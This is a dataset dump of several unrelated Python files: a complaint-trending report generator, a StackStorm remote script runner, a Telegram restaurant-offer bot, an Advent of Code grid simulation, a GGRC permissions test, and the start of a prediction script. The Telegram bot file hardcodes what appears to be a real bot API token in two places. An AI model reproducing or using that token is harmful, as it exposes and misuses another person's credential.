generate_visualizations(all_pivot_dec_2016, without_low_tx_battery_pivot_dec_2016, without_pairing_failed_pivot_dec_2016, 'dec_2016')\n\n # January 2017\n all_pivot_jan_2017, without_low_tx_battery_pivot_jan_2017, without_pairing_failed_pivot_jan_2017, all_unknown_tx_sn_count_jan_2017, \\\n without_low_tx_battery_unknown_tx_sn_count_jan_2017, without_pairing_issues_unknown_tx_sn_count_jan_2017 = \\\n generate_dfs('2017-01-01', '2017-02-01')\n generate_visualizations(all_pivot_jan_2017, without_low_tx_battery_pivot_jan_2017, without_pairing_failed_pivot_jan_2017, 'jan_2017')\n\n # February 2017\n all_pivot_feb_2017, without_low_tx_battery_pivot_feb_2017, without_pairing_failed_pivot_feb_2017, all_unknown_tx_sn_count_feb_2017, \\\n without_low_tx_battery_unknown_tx_sn_count_feb_2017, without_pairing_issues_unknown_tx_sn_count_feb_2017 = \\\n generate_dfs('2017-02-01', '2017-03-01')\n generate_visualizations(all_pivot_feb_2017, without_low_tx_battery_pivot_feb_2017, without_pairing_failed_pivot_feb_2017, 'feb_2017')\n\n # March 2017\n all_pivot_mar_2017, without_low_tx_battery_pivot_mar_2017, without_pairing_failed_pivot_mar_2017, all_unknown_tx_sn_count_mar_2017, \\\n without_low_tx_battery_unknown_tx_sn_count_mar_2017, without_pairing_issues_unknown_tx_sn_count_mar_2017 = \\\n generate_dfs('2017-03-01', '2017-04-01')\n generate_visualizations(all_pivot_mar_2017, without_low_tx_battery_pivot_mar_2017, without_pairing_failed_pivot_mar_2017, 'mar_2017')\n\n # April 2017\n all_pivot_apr_2017, without_low_tx_battery_pivot_apr_2017, without_pairing_failed_pivot_apr_2017, all_unknown_tx_sn_count_apr_2017, \\\n without_low_tx_battery_unknown_tx_sn_count_apr_2017, without_pairing_issues_unknown_tx_sn_count_apr_2017 = \\\n generate_dfs('2017-04-01', '2017-05-01')\n generate_visualizations(all_pivot_apr_2017, without_low_tx_battery_pivot_apr_2017, without_pairing_failed_pivot_apr_2017, 'apr_2017')\n\n # May 2017\n all_pivot_may_2017, without_low_tx_battery_pivot_may_2017, without_pairing_failed_pivot_may_2017, all_unknown_tx_sn_count_may_2017, \\\n without_low_tx_battery_unknown_tx_sn_count_may_2017, without_pairing_issues_unknown_tx_sn_count_may_2017 = \\\n generate_dfs('2017-05-01', '2017-06-01')\n generate_visualizations(all_pivot_may_2017, without_low_tx_battery_pivot_may_2017, without_pairing_failed_pivot_may_2017, 'may_2017')\n\n # June 2017\n all_pivot_jun_2017, without_low_tx_battery_pivot_jun_2017, without_pairing_failed_pivot_jun_2017, all_unknown_tx_sn_count_jun_2017, \\\n without_low_tx_battery_unknown_tx_sn_count_jun_2017, without_pairing_issues_unknown_tx_sn_count_jun_2017 = \\\n generate_dfs('2017-06-01', '2017-07-01')\n generate_visualizations(all_pivot_jun_2017, without_low_tx_battery_pivot_jun_2017, without_pairing_failed_pivot_jun_2017, 'jun_2017')\n\n # Weekly trending of top 4 issues\n dates_to_plot = pd.date_range(start='2016-10-01', end=pd.to_datetime(pr.export_date.tz_localize(None)), freq='W-SUN')\n issues_to_plot = ['Low TX Battery', 'Pairing Issues', 'Connectivity Issues', 'Transmitter Failed Icon']\n\n vis_2_pivot = problem_reports[~pd.isnull(problem_reports.date_of_issue) & (problem_reports['is_1.2_tx'] == True)].set_index('date_of_issue').groupby([pd.TimeGrouper('W-SUN'), 'bucket']).size().\\\n reindex(issues_to_plot, level=1).unstack(level=1).reindex(dates_to_plot).fillna(0)\n\n vis_2_pivot.index = [(i + pd.Timedelta(days=-6)).strftime('%m/%d') + ' - ' + i.strftime('%m/%d') for i in vis_2_pivot.index]\n vis_2_pivot['Sum'] = vis_2_pivot.sum(axis=1)\n\n # Bar chart\n plt.close('all')\n\n sns.set_context('paper')\n sns.set_style('darkgrid')\n matplotlib.rc('font', **{'family': 'serif', 'weight': 'normal', 'size': 10})\n matplotlib.rc('xtick', **{'labelsize': 'x-small'})\n matplotlib.rc('ytick', **{'labelsize': 'x-small'})\n\n fig, ax = plt.subplots(figsize=(7.5, 5))\n\n ind = range(len(vis_2_pivot))\n\n bar_containers = []\n for row_idx, column in enumerate(vis_2_pivot.columns[0:-1]):\n bar_container = ax.bar(ind, vis_2_pivot[column], width=0.7, bottom=vis_2_pivot.iloc[:, 0:row_idx].sum(axis=1), label=vis_2_pivot.columns[row_idx])\n bar_containers.append(bar_container)\n\n plt.xticks(ind, vis_2_pivot.index, rotation=270)\n\n for row_idx, rect in enumerate(bar_containers[-1]):\n ax.text(rect.get_x() + rect.get_width()/2., vis_2_pivot.ix[row_idx, 'Sum']+3, vis_2_pivot.ix[row_idx, 'Sum'].astype('int'), ha='center', va='bottom', fontsize='x-small')\n\n ax.set_ylabel('Quantity of TX 1.2 Complaints')\n ax.set_xlabel('Week of Incident')\n\n ax.legend()\n\n fig.savefig(os.path.join(pr.working_directory, 'bar_chart.pdf'), dpi=150, bbox_inches='tight')\n\n # Generate PDF report\n env = Environment(loader=FileSystemLoader(pr.script_directory))\n template = env.get_template('report_template.tex.jinja')\n\n template_kwargs = {\n 'all_pivot_full': all_pivot_full,\n 'without_low_tx_battery_pivot_full': without_low_tx_battery_pivot_full,\n 'without_pairing_failed_pivot_full': without_pairing_failed_pivot_full,\n 'all_unknown_tx_sn_count_full': all_unknown_tx_sn_count_full,\n 'without_low_tx_battery_unknown_tx_sn_count_full': without_low_tx_battery_unknown_tx_sn_count_full,\n 'without_pairing_issues_unknown_tx_sn_count_full': without_pairing_issues_unknown_tx_sn_count_full,\n\n 'all_pivot_nov_2016': all_pivot_nov_2016,\n 'without_low_tx_battery_pivot_nov_2016': without_low_tx_battery_pivot_nov_2016,\n 'without_pairing_failed_pivot_nov_2016': without_pairing_failed_pivot_nov_2016,\n 'all_unknown_tx_sn_count_nov_2016': all_unknown_tx_sn_count_nov_2016,\n 'without_low_tx_battery_unknown_tx_sn_count_nov_2016': without_low_tx_battery_unknown_tx_sn_count_nov_2016,\n 'without_pairing_issues_unknown_tx_sn_count_nov_2016': without_pairing_issues_unknown_tx_sn_count_nov_2016,\n\n 'all_pivot_dec_2016': all_pivot_dec_2016,\n 'without_low_tx_battery_pivot_dec_2016': without_low_tx_battery_pivot_dec_2016,\n 'without_pairing_failed_pivot_dec_2016': without_pairing_failed_pivot_dec_2016,\n 'all_unknown_tx_sn_count_dec_2016': all_unknown_tx_sn_count_dec_2016,\n 'without_low_tx_battery_unknown_tx_sn_count_dec_2016': without_low_tx_battery_unknown_tx_sn_count_dec_2016,\n 'without_pairing_issues_unknown_tx_sn_count_dec_2016': without_pairing_issues_unknown_tx_sn_count_dec_2016,\n\n 'all_pivot_jan_2017': all_pivot_jan_2017,\n 'without_low_tx_battery_pivot_jan_2017': without_low_tx_battery_pivot_jan_2017,\n 'without_pairing_failed_pivot_jan_2017': without_pairing_failed_pivot_jan_2017,\n 'all_unknown_tx_sn_count_jan_2017': all_unknown_tx_sn_count_jan_2017,\n 'without_low_tx_battery_unknown_tx_sn_count_jan_2017': without_low_tx_battery_unknown_tx_sn_count_jan_2017,\n 'without_pairing_issues_unknown_tx_sn_count_jan_2017': without_pairing_issues_unknown_tx_sn_count_jan_2017,\n\n 'all_pivot_feb_2017': all_pivot_feb_2017,\n 'without_low_tx_battery_pivot_feb_2017': without_low_tx_battery_pivot_feb_2017,\n 'without_pairing_failed_pivot_feb_2017': without_pairing_failed_pivot_feb_2017,\n 'all_unknown_tx_sn_count_feb_2017': all_unknown_tx_sn_count_feb_2017,\n 'without_low_tx_battery_unknown_tx_sn_count_feb_2017': without_low_tx_battery_unknown_tx_sn_count_feb_2017,\n 'without_pairing_issues_unknown_tx_sn_count_feb_2017': without_pairing_issues_unknown_tx_sn_count_feb_2017,\n\n 'all_pivot_mar_2017': all_pivot_mar_2017,\n 'without_low_tx_battery_pivot_mar_2017': without_low_tx_battery_pivot_mar_2017,\n 'without_pairing_failed_pivot_mar_2017': without_pairing_failed_pivot_mar_2017,\n 'all_unknown_tx_sn_count_mar_2017': all_unknown_tx_sn_count_mar_2017,\n 'without_low_tx_battery_unknown_tx_sn_count_mar_2017': without_low_tx_battery_unknown_tx_sn_count_mar_2017,\n 'without_pairing_issues_unknown_tx_sn_count_mar_2017': without_pairing_issues_unknown_tx_sn_count_mar_2017,\n \n 'all_pivot_apr_2017': all_pivot_apr_2017,\n 'without_low_tx_battery_pivot_apr_2017': without_low_tx_battery_pivot_apr_2017,\n 'without_pairing_failed_pivot_apr_2017': without_pairing_failed_pivot_apr_2017,\n 'all_unknown_tx_sn_count_apr_2017': all_unknown_tx_sn_count_apr_2017,\n 'without_low_tx_battery_unknown_tx_sn_count_apr_2017': without_low_tx_battery_unknown_tx_sn_count_apr_2017,\n 'without_pairing_issues_unknown_tx_sn_count_apr_2017': without_pairing_issues_unknown_tx_sn_count_apr_2017,\n\n 'all_pivot_may_2017': all_pivot_may_2017,\n 'without_low_tx_battery_pivot_may_2017': without_low_tx_battery_pivot_may_2017,\n 'without_pairing_failed_pivot_may_2017': without_pairing_failed_pivot_may_2017,\n 'all_unknown_tx_sn_count_may_2017': all_unknown_tx_sn_count_may_2017,\n 'without_low_tx_battery_unknown_tx_sn_count_may_2017': without_low_tx_battery_unknown_tx_sn_count_may_2017,\n 'without_pairing_issues_unknown_tx_sn_count_may_2017': without_pairing_issues_unknown_tx_sn_count_may_2017,\n\n 'all_pivot_jun_2017': all_pivot_jun_2017,\n 'without_low_tx_battery_pivot_jun_2017': without_low_tx_battery_pivot_jun_2017,\n 'without_pairing_failed_pivot_jun_2017': without_pairing_failed_pivot_jun_2017,\n 'all_unknown_tx_sn_count_jun_2017': all_unknown_tx_sn_count_jun_2017,\n 'without_low_tx_battery_unknown_tx_sn_count_jun_2017': without_low_tx_battery_unknown_tx_sn_count_jun_2017,\n 'without_pairing_issues_unknown_tx_sn_count_jun_2017': without_pairing_issues_unknown_tx_sn_count_jun_2017,\n\n 'incident_week_pivot_df': vis_2_pivot\n }\n\n with open(os.path.join(pr.working_directory, 'report.tex'), 'w') as f:\n f.write(template.render(**template_kwargs))\n\n # Run pdflatex\n subprocess.run(['pdflatex', os.path.join(pr.working_directory, 'report.tex'), '--output-directory', pr.working_directory], stdout=subprocess.DEVNULL, shell=True)\n subprocess.run(['pdflatex', os.path.join(pr.working_directory, 'report.tex'), '--output-directory', pr.working_directory], stdout=subprocess.DEVNULL, shell=True)\n\n # Export to Excel\n export_cols = OrderedDict()\n\n export_cols['psr_number'] = 'Complaint Number'\n export_cols['awareness_date'] = 'Awareness Date'\n export_cols['date_of_issue'] = 'Date of Issue'\n export_cols['problem_code_and_summary'] = 'Problem Code and Summary'\n export_cols['product_line_and_description'] = 'Product Line and Description'\n export_cols['serial_number'] = 'Serial Number (Free-text)'\n export_cols['ex_transmitter_sn'] = 'Transmitter Serial Number (Extracted)'\n export_cols['is_1.2_tx'] = 'Is Version 1.2 TX?'\n\n export_df = problem_reports.copy()\n export_df = export_df[list(export_cols.keys())].copy()\n export_df = export_df.rename(columns=export_cols)\n\n writer = pd.ExcelWriter(os.path.join(pr.working_directory, 'report.xlsx'), datetime_format='mm/dd/yyyy')\n export_df.to_excel(writer, index=False)\n writer.close()\n\n\ndef main():\n periodic_report = PeriodicReport(script_directory=os.path.dirname(os.path.abspath(__file__)))\n periodic_report.startup()\n\n searches = [\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/October 2016',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/November 2016',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/December 2016',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/January 2017',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/February 2017',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/March 2017',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/April 2017',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/May 2017',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/June 2017',\n ]\n periodic_report.run_agileplm_searches(searches)\n\n work(periodic_report)\n\n\nif __name__ == '__main__':\n main()","sub_path":"G5 Transmitter 1.2 Trending/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":26017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119806161","text":"# Licensed to the StackStorm, Inc ('StackStorm') under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport uuid\n\nfrom oslo.config import cfg\n\nfrom st2common import log as logging\nfrom st2actions.runners.fabric_runner import BaseFabricRunner\nfrom st2actions.runners.fabric_runner import RUNNER_REMOTE_DIR\nfrom st2common.models.system.action import FabricRemoteScriptAction\n\n__all__ = [\n 'get_runner',\n 'RemoteScriptRunner'\n]\n\nLOG = logging.getLogger(__name__)\n\n\ndef get_runner():\n return RemoteScriptRunner(str(uuid.uuid4()))\n\n\nclass RemoteScriptRunner(BaseFabricRunner):\n def run(self, action_parameters):\n LOG.debug(' action_parameters = %s', action_parameters)\n\n remote_action = self._get_remote_action(action_parameters)\n\n LOG.debug('Will execute remote_action : %s.', str(remote_action))\n result = self._run(remote_action)\n LOG.debug('Executed remote_action : %s. Result is : %s.', remote_action, result)\n status = self._get_result_status(result, cfg.CONF.ssh_runner.allow_partial_failure)\n\n self._log_action_completion(logger=LOG, result=result, status=status)\n return (status, result, None)\n\n def _get_remote_action(self, action_parameters):\n # remote script actions without entry_point don't make sense, user probably wanted to use\n # \"run-remote\" action\n if not self.entry_point:\n msg = ('Action \"%s\" is missing entry_point attribute. Perhaps wanted to use '\n '\"run-remote\" runner?')\n raise Exception(msg % (self.action_name))\n\n script_local_path_abs = self.entry_point\n pos_args, named_args = self._get_script_args(action_parameters)\n named_args = self._transform_named_args(named_args)\n env_vars = self._get_env_vars()\n remote_dir = self.runner_parameters.get(RUNNER_REMOTE_DIR,\n cfg.CONF.ssh_runner.remote_dir)\n remote_dir = os.path.join(remote_dir, self.liveaction_id)\n return FabricRemoteScriptAction(self.action_name,\n str(self.liveaction_id),\n script_local_path_abs,\n self.libs_dir_path,\n named_args=named_args,\n positional_args=pos_args,\n env_vars=env_vars,\n on_behalf_user=self._on_behalf_user,\n user=self._username,\n password=self._password,\n private_key=self._private_key,\n remote_dir=remote_dir,\n hosts=self._hosts,\n parallel=self._parallel,\n sudo=self._sudo,\n timeout=self._timeout,\n cwd=self._cwd)\n","sub_path":"st2actions/st2actions/runners/remote_script_runner.py","file_name":"remote_script_runner.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"602638249","text":"import logging\nimport pandas as pd\nimport telegram\nimport numpy as np\nimport random\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup \nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackQueryHandler\n\n\n# Reading Data\ndata = pd.read_csv(\"ig_scrapper/database/uni data/data_v1.01.csv\")\n\n# Temporal Data\nclass pt:\n ix = 0\n temp = pd.DataFrame()\n last = 0\n\n# Food Selection\nclass fd:\n\n postre = ('clasificacion', 'postre')\n desayuno = ('clasificacion', 'desayuno')\n gourmet = ('clasificacion', 'gourmet')\n chatarra = ('clasificacion', 'chatarra')\n combo = ('combo', True)\n pasapalo = ('clasificacion', 'pasapalo')\n cumple = ('Tortas',True)\n \n\n\n\n\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\ntoken = \"1203014270:AAEcmANbEwlLCtDqCW_xogdgUMU92xh9cxc\"\nbot = telegram.Bot(token=token)\n\ntry:\n chat_id = bot.get_updates()[-1].message.chat_id\nexcept IndexError:\n chat_id = 0\n\n####################################################################################################################\n\ndef mini_menu(update,context):\n keyboard = [\n \n [InlineKeyboardButton(\"🍳🥞Desayuno🥯🥪\", callback_data='desayuno')],\n [InlineKeyboardButton(\"🍝🍲Gourmet 🍱🍛\", callback_data='gourmet')],\n \n [InlineKeyboardButton(\"🍔🍟Chatarra🍕🌯\", callback_data='chatarra')],\n [InlineKeyboardButton(\"🧁🎂 Dulces 🍪🍩\", callback_data='postre')]\n \n ]\n \n return keyboard\n\ndef second_menu(update,context):\n keyboard = [\n \n [InlineKeyboardButton(\"🍔🍟Combos🍪🥤\", callback_data='combo')],\n [InlineKeyboardButton(\"🍤🥗Pasapalos 🧀🍾\", callback_data='pasapalo')],\n [InlineKeyboardButton(\"🎂🍮Cumpleaños🥧🥮\", callback_data='cumple')]\n \n ]\n \n return keyboard\n\ndef start(update, context):\n\n keyboard = mini_menu(update,context)\n reply_markup = InlineKeyboardMarkup(keyboard)\n\n update.message.reply_text('Hola '+'**'+str(update.message.chat.username)+'**'+''' Soy un Bot que trae ofertas de difrentes restaurantes en Valencia. \n Si quieres Mas selecciona /menu\n Mayor Informacion de este Bot /soporte''', reply_markup=reply_markup)\n \ndef clasificacion_data(data, columna, seleccion):\n \n temp = data[data[columna]==seleccion]\n ix = list(temp.index)\n random.shuffle(ix)\n return ix, temp\n\ndef next_fun( update, context, \n nx, temp, last):\n \n \n ruta = 'ig_scrapper/database/images/'\n url_ig = 'https://www.instagram.com' + str(temp['user url'][nx])\n \n if nx == last:\n\n keyboard = mini_menu(update,context)\n reply_markup = InlineKeyboardMarkup(keyboard)\n update.callback_query.message.reply_text('Ups😵, por ahora mi data es limitada😓', reply_markup=reply_markup)\n\n else:\n context.bot.send_photo(chat_id=update.effective_chat.id, photo = open( ruta + str(temp['img name'][nx]),'rb'))\n \n if (temp['ws'][nx] is 'False') | (temp['ws'][nx] is False):\n \n keyboard = [\n \n [InlineKeyboardButton(\"Instagram\", url=url_ig)],\n\n [InlineKeyboardButton(\"⏹Menu\", callback_data='menu_'),\n InlineKeyboardButton(\"Siguiente▶️\", callback_data='next_fun')]\n \n ]\n else:\n url_ws = 'https://api.whatsapp.com/send?phone=+58'+ str(temp['ws'][nx]) +'&text=Hola,%20Te%20encontre%20gracias%20Offer_Eat%20Telegram'\n keyboard = [\n \n [InlineKeyboardButton(\"Whatsapp\", url=url_ws),\n InlineKeyboardButton(\"Instagram\", url=url_ig)],\n\n [InlineKeyboardButton(\"⏹Menu\", callback_data='menu_'),\n InlineKeyboardButton(\"Siguiente▶️\", callback_data='next_fun')]\n \n ]\n \n reply_markup = InlineKeyboardMarkup(keyboard)\n\n # Some Items doesn't have content\n\n if temp['content'][nx] is 'False' | (temp['content'][nx] is False):\n update.callback_query.message.reply_text('Cuenta: '+ str(temp['user name'][nx]), reply_markup=reply_markup)\n else:\n update.callback_query.message.reply_text('Cuenta: '+ str(temp['user name'][nx]) + '\\n' + temp['content'][nx], reply_markup=reply_markup)\n \n \n\ndef post_fun(update,context, data, fd):\n\n ix, temp = clasificacion_data(data, fd[0], fd[1])\n \n \n # Saving in temporal Class\n\n pt.ix = iter(ix)\n pt.temp = temp\n pt.last = ix[-1]\n \n\n next_fun(update, context, \n next(pt.ix), pt.temp, pt.last)\n \n \n \n\n\ndef post(update, context):\n \n context.bot.send_photo(chat_id=update.effective_chat.id, photo = open( 'ig_scrapper/database/images/image0.jpg','rb'))\n update.message.reply_text(data['content'][0])\n \n\ndef soporte(update, context):\n \n update.message.reply_text('''Este Bot esta en Version Beta, la idea simplificar la busqueda de restaurantes en Valencia.\n Desarrolado por Juan Vicente ventrone\n si deseas contactar a mi creador: https://t.me/JVentrone''')\n \ndef menu(update, context):\n \n k_1 = mini_menu(update,context)\n k_2 = second_menu(update,context)\n\n keyboard = k_1 + k_2\n reply_markup = InlineKeyboardMarkup(keyboard)\n\n try:\n update.message.reply_text('Para Mayor Informacion /soporte', reply_markup=reply_markup)\n except:\n update.callback_query.message.reply_text('Para Mayor Informacion /soporte', reply_markup=reply_markup)\n\n\ndef progresivo(update,context):\n \n if pt.ix == 0: return menu(update, context)\n \n next_fun(update, context, \n next(pt.ix), pt.temp, pt.last)\n\n# This is bad, but it's just a propotype after, I will Fix this Chorizo!\ndef desayuno(update, context): post_fun(update,context,data, fd.desayuno)\ndef gourmet(update, context): post_fun(update,context,data, fd.gourmet)\ndef gourmet(update, context): post_fun(update,context,data, fd.gourmet)\ndef chatarra(update, context): post_fun(update,context,data, fd.chatarra)\ndef postre(update, context): post_fun(update,context,data, fd.postre)\ndef combo(update, context): post_fun(update,context,data, fd.combo)\ndef pasapalo(update, context): post_fun(update,context,data, fd.pasapalo)\ndef cumple(update, context): post_fun(update,context,data, fd.cumple)\n\n\n\n\ndef main():\n \n \n # Create the Updater and pass it your bot's token.\n # Make sure to set use_context=True to use the new context based callbacks\n # Post version 12 this will no longer be necessary\n updater = Updater(\"1203014270:AAEcmANbEwlLCtDqCW_xogdgUMU92xh9cxc\", use_context=True)\n\n # Get the dispatcher to register handlers\n dp = updater.dispatcher\n\n # on different commands - answer in Telegram\n dp.add_handler(CommandHandler(\"start\", start))\n dp.add_handler(CommandHandler(\"menu\", menu))\n dp.add_handler(CommandHandler(\"soporte\", soporte))\n \n # Bottons Commander \n dp.add_handler(CallbackQueryHandler(progresivo, pattern='^next_fun$'))\n dp.add_handler(CallbackQueryHandler(desayuno, pattern='^desayuno$'))\n dp.add_handler(CallbackQueryHandler(gourmet, pattern='^gourmet$'))\n dp.add_handler(CallbackQueryHandler(postre, pattern='^postre$'))\n dp.add_handler(CallbackQueryHandler(chatarra, pattern='^chatarra$'))\n dp.add_handler(CallbackQueryHandler(combo, pattern='^combo$'))\n dp.add_handler(CallbackQueryHandler(cumple, pattern='^cumple$'))\n dp.add_handler(CallbackQueryHandler(pasapalo, pattern='^pasapalo$'))\n dp.add_handler(CallbackQueryHandler(menu, pattern='^menu_$'))\n \n # Start the Bot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()\n \n\n\nif __name__ == '__main__':\n main()\n","sub_path":"_init_.py","file_name":"_init_.py","file_ext":"py","file_size_in_byte":8155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115616703","text":"#!/usr/local/bin/python3\n\nimport copy\n\nneighbours = [(-1, -1, -1),\n (-1, 0, -1),\n (-1, 1, -1),\n (0, -1, -1),\n (0, 1, -1),\n (1, -1, -1),\n (1, 0, -1),\n (1, 1, -1),\n (-1, -1, 0),\n (-1, 0, 0),\n (-1, 1, 0),\n (0, -1, 0),\n (0, 1, 0),\n (1, -1, 0),\n (1, 0, 0),\n (1, 1, 0),\n (-1, -1, 1),\n (-1, 0, 1),\n (-1, 1, 1),\n (0, -1, 1),\n (0, 1, 1),\n (1, -1, 1),\n (1, 0, 1),\n (1, 1, 1),\n (0, 0, -1),\n (0, 0, 1)]\n \ndef prefill_grid(size):\n grid = []\n for z in range(0,size):\n grid.append([])\n for y in range(0,size):\n grid[z].append([])\n for x in range(0,size):\n grid[z][y].append(\".\")\n return grid\n \ndef load_grid(location, size):\n grid = prefill_grid(size)\n offset = int(size / 2)\n input = []\n with open(str(location), 'r') as file:\n for line in file:\n input.append(list(line.rstrip()))\n for y, l in enumerate(input):\n for x, c in enumerate(l):\n grid[offset][offset + y][offset + x] = c\n return grid\n \ndef process_node(x, y, z, grid, new_grid):\n current_value = grid[z][y][x]\n inactive = 0\n active = 0\n for node in neighbours:\n if -1 < z + node[2] < len(grid) and -1 < y + node[1] < len(grid[x]) and -1 < x + node[0] < len(grid[x][y]):\n node_value = grid[z + node[2]][y + node[1]][x + node[0]]\n if node_value == \".\":\n inactive += 1\n elif node_value == \"#\":\n active += 1\n if current_value == \"#\" and not 1 < active < 4:\n new_grid[z][y][x] = \".\"\n elif current_value == \".\" and active == 3:\n new_grid[z][y][x] = \"#\"\n return new_grid\n\ndef run_cycle(grid):\n new_grid = copy.deepcopy(grid)\n for z, layer in enumerate(grid):\n for y, row in enumerate(layer):\n for x, char in enumerate(row):\n new_grid = process_node(x, y, z, grid, new_grid)\n return new_grid\n\ndef process_grid(location):\n size = 26\n grid = load_grid(location, size)\n for _ in range(0,6):\n grid = run_cycle(grid)\n count = 0\n for layer in grid:\n for row in layer:\n count += row.count(\"#\")\n print(location + \" - Active Count: \" + str(count))\n\nprocess_grid(\"17-test.txt\")\nprocess_grid(\"17-input.txt\")\n\n","sub_path":"day17/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"540813447","text":"# Copyright (C) 2017 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"Test Mapping Issue mapping\"\"\"\n\nfrom ddt import data, ddt, unpack\nfrom ggrc.app import app # NOQA pylint: disable=unused-import\nfrom ggrc.models import all_models\nfrom integration.ggrc import TestCase\nfrom integration.ggrc.api_helper import Api\nfrom integration.ggrc.models import factories\nfrom integration.ggrc_basic_permissions.models \\\n import factories as rbac_factories\n\n\ndef _get_map_dict(destination, source):\n return {\n 'relationship': {\n \"context\": {\n \"id\": destination.context.id,\n \"type\": \"Context\"\n },\n \"source\": {\n \"id\": source.id,\n \"type\": source.type\n },\n \"destination\": {\n \"id\": destination.id,\n \"type\": destination.type\n }\n }\n }\n\n\n@ddt\nclass TestIssueMapping(TestCase):\n \"\"\"Test Issue mapping\"\"\"\n\n def setup_roles(self):\n \"\"\"Setup necessary roles needed by the tests\"\"\"\n query = all_models.Role.query\n self.roles = {\n 'creator': query.filter_by(name=\"Creator\").first(),\n 'auditor': query.filter_by(name=\"Auditor\").first(),\n 'program_editor': query.filter_by(name=\"ProgramEditor\").first()\n }\n\n def setup_users(self):\n \"\"\"Creates two creator users\"\"\"\n self.users = {}\n for user_name in ('auditor', 'auditlead'):\n user = factories.PersonFactory()\n rbac_factories.UserRoleFactory(\n role=self.roles['creator'],\n person=user)\n self.users[user_name] = user\n\n def setup_audits(self):\n \"\"\"Create an audit and an archived audit\"\"\"\n self.audits = {\n False: self.create_audit(archived=False),\n True: self.create_audit(archived=True)\n }\n\n def setup_snapshots_and_issue(self):\n \"\"\"Create snapshot & issue objects\"\"\"\n self.snapshots = {}\n self.issues = {}\n self.control = factories.ControlFactory()\n revision = all_models.Revision.query.filter(\n all_models.Revision.resource_type == self.control.type).first()\n for is_archived in (False, True):\n audit = self.audits[is_archived]\n # Create a snapshot\n self.snapshots[is_archived] = factories.SnapshotFactory(\n child_id=revision.resource_id,\n child_type=revision.resource_type,\n revision=revision,\n parent=audit,\n context=audit.context,\n )\n # Create an issue\n issue = factories.IssueFactory()\n self.issues[is_archived] = issue\n # Map issue to audit\n factories.RelationshipFactory(\n source=audit,\n destination=issue,\n context=audit.context\n )\n\n def create_audit(self, archived=False):\n \"\"\"Create an audit object and fix the it's context\"\"\"\n audit = factories.AuditFactory(\n contact=self.users['auditlead'],\n archived=archived\n )\n\n # Add auditor & program editor roles\n rbac_factories.UserRoleFactory(\n context=audit.context,\n role=self.roles['auditor'],\n person=self.users['auditor'])\n rbac_factories.UserRoleFactory(\n context=audit.program.context,\n role=self.roles['program_editor'],\n person=self.users['auditlead'])\n\n return audit\n\n def setUp(self):\n \"\"\"Prepare data needed to run the tests\"\"\"\n self.api = Api()\n self.setup_roles()\n self.setup_users()\n self.setup_audits()\n self.setup_snapshots_and_issue()\n\n @data(\n # user_name, is_archived\n ('auditor', True),\n ('auditlead', True),\n ('auditor', False),\n ('auditlead', False),\n )\n @unpack\n def test_mapping_to_issue(self, user_name, is_archived):\n \"\"\"Test mapping snapshots to issue\"\"\"\n user = self.users[user_name]\n payload = _get_map_dict(\n self.snapshots[is_archived],\n self.issues[is_archived])\n self.api.set_user(user)\n\n # Try to map to audit\n response = self.api.post(all_models.Relationship, payload)\n self.assertStatus(response, 201)\n\n rel_id = response.json['relationship']['id']\n relationship = all_models.Relationship.query.filter_by(id=rel_id).first()\n response = self.api.delete(relationship)\n self.assertStatus(response, 200)\n","sub_path":"test/integration/ggrc_basic_permissions/test_issue_mapping.py","file_name":"test_issue_mapping.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"318584721","text":"#import all imports and parameters from import_parameters.py\n\nfrom import_parameters import *\n\nparser = argparse.ArgumentParser(description = 'All arguments to be used in predicting')\nparser.add_argument ('--checkpoint', default = 'checkpoint.pth', help = 'Filename of checkpoint (default = checkpoint.pth)', metavar = '')\nparser.add_argument ('--arch', metavar='ARCH', default='vgg16', help='Chose between two options; densenet161 or vgg16 (default is vgg16)')\nparser.add_argument ('--device', default = 'GPU', help = 'Chose which device will be used to predict (default is GPU if available, otherwise CPU)')\nparser.add_argument ('--train_dir', default = 'flowers/train', help = 'Directory of training fotos, this needs to be mentioned', metavar = '')\nparser.add_argument ('--image_path', default = \"flowers/test/10/image_07090.jpg\", help = 'Image path of immage to be classified (default is flowers/test/10/image_07090.jpg)', metavar = '')\nparser.add_argument ('--hidden_units', default = 512, type=int, help = 'Number of units in the first hidden layer (default is 512)')\n\nargs = parser.parse_args()\n\n\nfilepath = args.checkpoint\narch = 